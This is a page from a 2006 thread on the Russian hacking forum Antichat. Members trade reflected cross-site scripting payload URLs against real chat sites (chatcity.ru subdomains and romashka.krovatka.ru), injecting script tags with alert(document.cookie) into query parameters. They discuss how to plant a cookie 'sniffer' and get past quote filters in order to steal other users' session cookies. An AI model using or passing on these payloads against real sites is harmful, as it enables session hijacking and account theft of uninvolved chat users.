ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу Чатсити
   
Ответ
Страница 2 из 3 < 1 2 3 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 12.05.2006, 21:56
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию
Автор, вставляй не alert('text'), а alert(document.cookie);.. хоть пассивную xss-ку найти можно..

но пока чё-то не получается.. если вот так взять..
можно попробовать залогиниться и ссылку кому-нить дать затестить..
 
Ответить с цитированием

  #12  
Старый 12.05.2006, 22:01
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
Rebz, если алерт проходит, то уже значит дыра есть, а раз дыра, то 80-90% что там xss..

PS у меня ник есть) Или называй слип, меня так все называют)
__________________
..
Последний раз редактировалось sL(IP)--!(P.i.N.); 13.05.2006 в 10:43..
 
Ответить с цитированием

  #13  
Старый 13.05.2006, 08:34
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию
Ты сунул комунить , на съедение ? если что не забудь закодировать в 16 битном.
 
Ответить с цитированием

  #14  
Старый 13.05.2006, 10:33
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
_http://www.38557.chatcity.ru/bug/?err=NoChMap(check_user_ids)&http://www.38557.chatcity.ru&f=45&newwin=1&id2=9919&id=65 95wr35ou9b&c=38557/"><script>alert('Yo')</script>
Вот эту давал себе на съедение) Не приходят куки..
А с этой не пробовал:
_http://www.38557.chatcity.ru/kpobatka?f=45&newwin=1&id2=9919&id=6595wr35Ou9b&c= 38557"><script>alert('Yo')</script>
И ещё одно, со второй дыркой (см. выше) интересная вещь.. Когда заходишь, ну пишет о прекращении связи, нажимаешь отмену, выпадает алерт, потом нажимаешь на ссылку *Сообщить об ошибке* и на открывающейся странице, алерт уже выпадает автоматом) Хотя в адресной строке его нету) Ну и на открывшейся странице, можно просмотреть свой айпишник и т.д.)
__________________
..
Последний раз редактировалось sL(IP)--!(P.i.N.); 13.05.2006 в 10:40..
 
Ответить с цитированием

  #15  
Старый 13.05.2006, 20:02
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
Ну что, люди, кто нибудь что нить интересное нашёл?
__________________
..
 
Ответить с цитированием

  #16  
Старый 14.05.2006, 11:29
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию
давай уже из алертов xss делай... а то на полпути остановился..
 
Ответить с цитированием

  #17  
Старый 14.05.2006, 11:32
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
Там есть xss, только сниффер не получается вогнать((
__________________
..
 
Ответить с цитированием

  #18  
Старый 14.05.2006, 11:38
Антошка2003
Постоянный
Регистрация: 03.04.2005
Сообщений: 610
Провел на форуме:
3238231

Репутация: 165


По умолчанию
может пригодиться, ещё один алерт
_http://romashka.krovatka.ru/k?f=60&id=6226VLpq63TU&c=8&st=</script><script>alert(document.cookie)</script><h1>xss%20by%20Antoshka2003</h1&nc=2162
 
Ответить с цитированием

  #19  
Старый 14.05.2006, 16:53
DRON-ANARCHY
Отец порядка
Регистрация: 04.03.2005
Сообщений: 1,007
Провел на форуме:
1204641

Репутация: 412


Отправить сообщение для DRON-ANARCHY с помощью ICQ
По умолчанию
Ну, вообще-то сниффер не всегда можно впарить...например ссылка на сниффер заключается в кавычки, а на сайте стоит на них филтр...получается, что алерт вылетает на раз, а толку-ноль.
 
Ответить с цитированием

  #20  
Старый 15.05.2006, 16:35
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


Talking
Ещё небольшое добавление по чатсити..
Во первых расшарил форму входа в чат, так, на всякий случай, может кому то пригодится:
Код:
<form action="http://38557.chatcity.ru/" method=post>
<input type=hidden name="c" value="38557">
Имя: <input name="mn" maxlength=30>
Пароль: <input type=password name="pass"> (для зарегистрированных)
<input type=submit value=" OK ">
</form>
И ещё одна xss:
_http://www.38557.chatcity.ru/people/pp10.cgi?c=38557&str=%3Cscript%3Ealert%28%27Yo%27% 29%3C%2Fscript%3E
Они лолы, на самом видном месте.. На поиске какой либо анкеты..
__________________
..
Последний раз редактировалось sL(IP)--!(P.i.N.); 15.05.2006 в 16:44.. Причина: хочу=)
 
Ответить с цитированием
Ответ
Страница 2 из 3 < 1 2 3 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
ЧАТСИТИ.... ~rEpSaC~ Чаты 5 29.03.2004 03:24



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ